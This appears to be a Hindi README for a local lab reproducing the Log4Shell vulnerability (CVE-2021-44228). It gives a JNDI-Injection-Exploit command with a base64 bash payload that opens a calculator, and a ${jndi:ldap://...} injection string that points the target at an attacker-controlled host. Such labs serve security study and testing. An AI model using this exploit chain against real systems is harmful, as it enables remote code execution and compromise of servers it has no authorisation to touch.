
CVE-2021-44228 भेद्यता पुनरुत्पादन वातावरण CVE-2021-44228 भेद्यता पुनरुत्पादन वातावरण
प्रोजेक्ट प्रारंभ होने के बाद पहुंचें: http://127.0.0.1:9090/vul
JDK संस्करण: java8u92 (बहुत अधिक संस्करण का उपयोग करने से बचें, मेरे जैसा ही उपयोग करने की अनुशंसा की जाती है, उच्च संस्करण JNDI इंजेक्शन पर कुछ प्रतिबंध लगाते हैं)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9y}|{base64,-d}|{bash,-i}" -A 127.0.0.1
उपरोक्त टूल का उपयोग करके PAYLOAD उत्पन्न करें।
पहुंचें http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx}